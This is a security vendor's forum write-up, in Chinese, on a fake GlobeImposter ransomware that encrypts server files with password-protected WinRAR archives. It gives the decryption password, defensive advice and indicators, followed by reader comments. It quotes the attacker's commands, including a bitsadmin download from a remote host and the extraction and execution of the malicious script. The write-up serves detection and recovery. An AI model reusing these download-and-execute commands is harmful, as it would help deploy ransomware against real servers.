[原创]WinRAR加密压缩冒充GlobeImposter勒索病毒，腾讯安全专家轻松解密-软件逆向-看雪-安全社区|安全招聘|kanxue.com

[原创]WinRAR加密压缩冒充GlobeImposter勒索病毒，腾讯安全专家轻松解密

发表于: 2019-7-2 21:11 4121

[原创]WinRAR加密压缩冒充GlobeImposter勒索病毒，腾讯安全专家轻松解密

腾讯电脑管家

2019-7-2 21:11

4121

近日，腾讯安全御见威胁情报中心发现假冒GlobeImposter勒索病毒正在传播，攻击者疑通过MS SQL爆破入侵服务器，通过网络下载恶意脚本代码，继而执行加密和勒索流程。

令人惊叹的是，这个所谓的“勒索病毒”执行极为简单，只是利用WinRAR加密压缩用户文件，之后再将一封GlobeImposter的勒索消息邮件修改后恐吓用户，通过邮箱联系索取酬金。腾讯安全提醒大家，如遇到此病毒，不要着急着缴纳赎金。该病毒加密压缩的密码明文写在病毒配置信息中，使用这个密码解压缩，文件就能完全恢复。

分析

被勒索服务器疑似被通过MSSQL爆破入侵成功，之后执行以下相关命令行进一步下载执行恶意代码：

1）bitsadmin /transfer n fe9K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0b7%4i4K6u0W2z5e0u0Q4x3X3f1#2y4g2)9J5k6e0t1K6z5g2)9J5c8Y4y4Q4x3V1k6B7M7U0t1$3i4K6u0W2M7X3q4J5 C:/Progra~1/jr26.rar

2）C:\Windows\system32\cmd.exe /c C:\Progra~1\winrar\rar.exe e -pp.5p C:\Progra~1\jr26.rar

3）C:\Windows\system32\cmd.exe /c C:\Progra~1\jr26.cmd

jr26.rar为一个带密码的压缩包，密码为p.5p

jr26.rar解压后可得到一个疑似乱码的脚本文件

16进制查看可发现貌似多了0xFF 0xFE 0x0D 0x0A，目测应该是以二进制形式写入的标志，导致文本类识别工具无法查看

去掉0xFF 0xFE 0x0D 0x0A后尝试再次打开，脚本内容已可以正常查看

查看脚本内容可知，主要目的为将指定类型的文件根据后缀分类，分别使用winrar进行加密压缩（通过上图的命令行参数，我们看到加密密码为lll.hc3t6b9s8kz5r26），文件将被压缩至根目录下对应的不同文件名（邮箱.ch_文件后缀类型.随机数字tiger88818）包内，同时删除原始文件。

如下图Decryptcn@protonmail.ch_bax.32419tiger88818包内，则被带密码压缩了所有bak类型的文件

同时，为了防止加密压缩时，数据库文件被占用导致加密中止，病毒还会结束大量的数据库服务相关进程。

最奇葩的来了，加密文件完成后，病毒会通过远程下载一个勒索说明文档

打开说明文档，竟然是知名勒索病毒GlobeImposter的修改版本，该病毒作者只是修改了联系邮箱。

进一步观察病毒使用的url可发现攻击者使用的多个文件，分别有勒索说明文档（HOW_TO_BACK_YOUR_FILE*），勒索脚本包(jr26.rar)，正规的winrar压缩模块(Rar.exe)，猜测为扫描器相关模块包(带未知密码的s.rar包)，且病毒使用服务部署在某知名云平台服务器上。

腾讯安全提醒大家，针对此病毒，可以不必着急缴纳赎金，可尝试使用Winrar打开根目录中的*tiger88818后缀文件，然后选择使用密码（lll.hc3t6b9s8kz5r26）解压到指定位置，即可恢复文件。

安全建议

企业用户：

1、尽量关闭不必要的端口，如：445、135，139等，对3389，5900等端口可进行白名单配置，只允许白名单内的IP连接登陆；

2、尽量关闭不必要的文件共享，如有需要，请使用ACL和强密码保护来限制访问权限，禁用对共享文件夹的匿名访问；

3、采用高强度的密码，避免使用弱口令密码，并定期更换密码。建议服务器密码使用高强度且无规律密码，并且强制要求每个服务器使用不同密码管理；

4、对没有互联需求的服务器/工作站内部访问设置相应控制，避免可连外网服务器被攻击后作为跳板进一步攻击其他服务器；

5、对重要文件和数据（数据库等数据）进行定期非本地备份；

6、教育终端用户谨慎下载陌生邮件附件，若非必要，应禁止启用Office宏代码；

7、在终端/服务器部署专业安全防护软件，Web服务器可考虑部署在腾讯云等具备专业安全防护能力的云服务；

8、建议全网安装御点终端安全管理系统（7cfK9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6K6i4K6u0W2N6r3g2F1j5$3g2F1N6q4)9J5k6h3y4G2L8g2)9J5c8Y4m8J5L8$3c8#2j5%4c8Q4x3V1k6&6k6q4)9J5c8X3W2F1k6r3g2^5i4K6u0W2K9s2c8E0L8q4!0q4c8W2!0n7b7#2)9^5z5g2!0q4x3#2)9^5x3q4)9^5x3W2!0q4y4g2!0n7c8g2!0m8x3g2!0q4y4#2)9^5x3W2!0n7z5g2!0q4y4#2!0n7b7W2)9^5z5q4!0q4y4#2!0m8b7W2!0m8c8W2!0q4y4g2!0m8c8g2)9^5z5g2!0q4y4g2)9^5y4g2!0m8z5q4!0q4y4#2!0m8c8g2!0m8x3g2!0q4y4#2)9&6x3q4)9^5y4W2!0q4y4#2!0n7x3#2!0n7b7W2!0q4y4#2!0n7b7W2)9&6c8W2!0q4y4g2)9^5y4g2!0n7y4#2!0q4y4g2!0m8y4q4)9^5y4#2!0q4y4#2!0n7b7W2)9^5z5q4!0q4y4#2!0m8b7W2!0m8c8W2!0q4y4W2)9&6c8q4)9^5x3q4!0q4y4W2!0m8c8W2)9&6x3W2!0q4y4#2!0n7b7W2)9&6c8W2!0q4y4q4!0n7z5q4)9^5x3q4!0q4y4#2!0m8c8g2!0m8x3g2!0q4y4W2)9^5c8g2!0m8y4#2!0q4x3#2)9^5x3q4)9^5x3g2!0q4y4q4!0n7c8W2!0m8c8g2!0q4y4g2!0m8y4q4)9^5c8q4!0q4y4W2!0n7b7#2)9^5c8W2!0q4y4W2!0n7y4q4)9&6c8g2!0q4y4#2!0n7b7W2)9&6c8W2!0q4y4q4!0n7z5q4)9^5x3q4!0q4y4#2!0m8c8g2!0m8x3g2!0q4y4W2)9^5c8g2!0m8y4#2!0q4c8W2!0n7b7#2)9^5b7#2!0q4y4q4!0n7b7W2!0m8y4g2!0q4y4g2)9^5c8W2)9^5b7g2!0q4y4#2!0m8c8q4)9&6y4W2!0q4y4#2)9&6y4g2!0m8y4g2!0q4y4#2!0m8c8g2!0m8x3g2!0q4y4W2)9^5c8g2!0m8y4#2!0q4y4#2!0m8c8q4)9^5z5g2!0q4y4g2)9^5y4g2!0m8z5q4!0q4y4W2)9&6y4W2!0n7z5g2!0q4y4q4!0n7c8q4)9^5c8q4!0q4y4#2)9&6b7g2)9^5y4q4!0q4y4g2!0m8c8g2)9^5z5g2!0q4y4g2)9^5y4g2!0m8z5q4!0q4y4#2!0m8c8g2!0m8x3g2!0q4y4#2)9&6x3q4)9^5y4W2!0q4y4g2)9^5b7g2)9&6c8W2!0q4z5q4)9^5x3#2!0n7c8q4!0q4c8W2!0n7b7#2)9^5b7#2!0q4y4g2)9^5c8W2!0m8c8W2!0q4y4g2!0n7z5q4!0m8c8g2!0q4y4g2)9^5b7g2!0m8z5g2!0q4y4q4!0n7b7#2)9^5x3g2!0q4y4q4!0n7z5q4)9&6b7g2!0q4y4#2!0m8c8g2!0m8x3g2!0q4y4#2)9&6x3q4)9^5y4W2!0q4z5q4)9^5x3q4)9^5y4g2!0q4y4g2)9^5y4g2!0m8z5q4!0q4z5g2)9&6c8q4!0m8x3W2!0q4y4q4!0n7b7g2)9^5y4W2!0q4z5q4!0m8y4#2!0m8x3#2!0q4x3#2)9^5x3q4)9^5x3g2!0q4y4#2!0m8c8g2!0m8x3g2!0q4y4#2)9&6x3q4)9^5y4W2!0q4y4q4!0n7b7#2)9^5x3g2!0q4y4q4!0n7z5q4)9&6b7g2!0q4y4g2)9^5y4W2)9^5y4g2!0q4y4#2!0n7c8q4)9&6x3g2!0q4y4g2!0m8c8g2)9^5z5g2!0q4y4g2)9^5y4g2!0m8z5q4!0q4y4#2)9^5b7g2!0n7y4W2!0q4y4g2)9^5y4W2!0n7y4g2!0q4x3#2)9^5x3q4)9^5x3g2!0q4y4q4!0n7c8W2)9&6c8q4!0q4y4W2)9^5b7g2!0m8y4q4!0q4y4q4!0n7b7#2)9^5x3g2!0q4y4q4!0n7z5q4)9&6b7g2!0q4y4g2!0m8c8g2)9^5z5g2!0q4y4g2)9^5y4g2!0m8z5q4!0q4x3#2)9^5x3q4)9^5x3R3`.`.

个人用户：

1、启用腾讯电脑管家，勿随意打开陌生邮件，关闭Office执行宏代码；

2、打开电脑管家的文档守护者功能，利用磁盘冗余空间自动备份数据文档，即使发生意外，数据也可有备无患。

IOCs

MD5:

36e826b4a06dcbf039fb8fd6aeca4836

e9613db5620dbcb56903b98532971582

f18b3b2dc6556d60663d70ac411c0ac8

URL：
hxxp://47.92.55.239/s/HOW_TO_BACK_YOUR_FILES.txt
hxxp://47.92.55.239/s/HOW_TO_BACK_YOUR_FILESxx.rar
hxxp://47.92.55.239/s/jr26.rar
hxxp://47.92.55.239/s/Rar.exe
hxxp://47.92.55.239/s/s.rar

[培训]科锐逆向工程师培训第53期2025年7月8日开班！

收藏・2

免费・0

支持

最新回复 (6)
hzqst 雪币： 12876 活跃值： (9342) 能力值： ( LV9，RANK：280 ) 在线值：发帖 47 回帖 1794 粉丝 606 关注私信	hzqst 3 2 楼阿里云要求实名的把服务器放阿里云活腻了？ 2019-7-2 23:05 1
youxiaxy 雪币： 2049 活跃值： (2082) 能力值： ( LV2，RANK：10 ) 在线值：发帖 1 回帖 226 粉丝 4 关注私信	youxiaxy 3 楼真够懒的。坐等吃官粮吧 2019-7-3 07:27 0
kxzpy 雪币： 3496 活跃值： (749) 能力值： ( LV2，RANK：10 ) 在线值：发帖 6 回帖 262 粉丝 2 关注私信	kxzpy 4 楼吃啥官司，这种都是肉鸡 2019-7-3 08:57 0
MMgogo 雪币： 192 能力值： ( LV1，RANK：0 ) 在线值：发帖 0 回帖 3 粉丝 0 关注私信	MMgogo 5 楼求助我两台服务器都中了但是那个密码解压不了求老大们帮看看可以付费 2019-7-6 21:16 1
MMgogo 雪币： 192 能力值： ( LV1，RANK：0 ) 在线值：发帖 0 回帖 3 粉丝 0 关注私信	MMgogo 6 楼求大佬帮助 2019-7-6 21:17 0
MMgogo 雪币： 192 能力值： ( LV1，RANK：0 ) 在线值：发帖 0 回帖 3 粉丝 0 关注私信	MMgogo 7 楼 2019-7-6 22:32 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复

腾讯电脑管家

304

发帖

304

回帖

RANK

关注

私信

他的文章

关于我们

联系我们

企业服务

看雪公众号

最新回复 (6)
hzqst 雪币： 12876 活跃值： (9342) 能力值： ( LV9，RANK：280 ) 在线值：发帖 47 回帖 1794 粉丝 606 关注私信	hzqst 3 2 楼阿里云要求实名的把服务器放阿里云活腻了？ 2019-7-2 23:05 1
youxiaxy 雪币： 2049 活跃值： (2082) 能力值： ( LV2，RANK：10 ) 在线值：发帖 1 回帖 226 粉丝 4 关注私信	youxiaxy 3 楼真够懒的。坐等吃官粮吧 2019-7-3 07:27 0
kxzpy 雪币： 3496 活跃值： (749) 能力值： ( LV2，RANK：10 ) 在线值：发帖 6 回帖 262 粉丝 2 关注私信	kxzpy 4 楼吃啥官司，这种都是肉鸡 2019-7-3 08:57 0
MMgogo 雪币： 192 能力值： ( LV1，RANK：0 ) 在线值：发帖 0 回帖 3 粉丝 0 关注私信	MMgogo 5 楼求助我两台服务器都中了但是那个密码解压不了求老大们帮看看可以付费 2019-7-6 21:16 1
MMgogo 雪币： 192 能力值： ( LV1，RANK：0 ) 在线值：发帖 0 回帖 3 粉丝 0 关注私信	MMgogo 6 楼求大佬帮助 2019-7-6 21:17 0
MMgogo 雪币： 192 能力值： ( LV1，RANK：0 ) 在线值：发帖 0 回帖 3 粉丝 0 关注私信	MMgogo 7 楼 2019-7-6 22:32 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复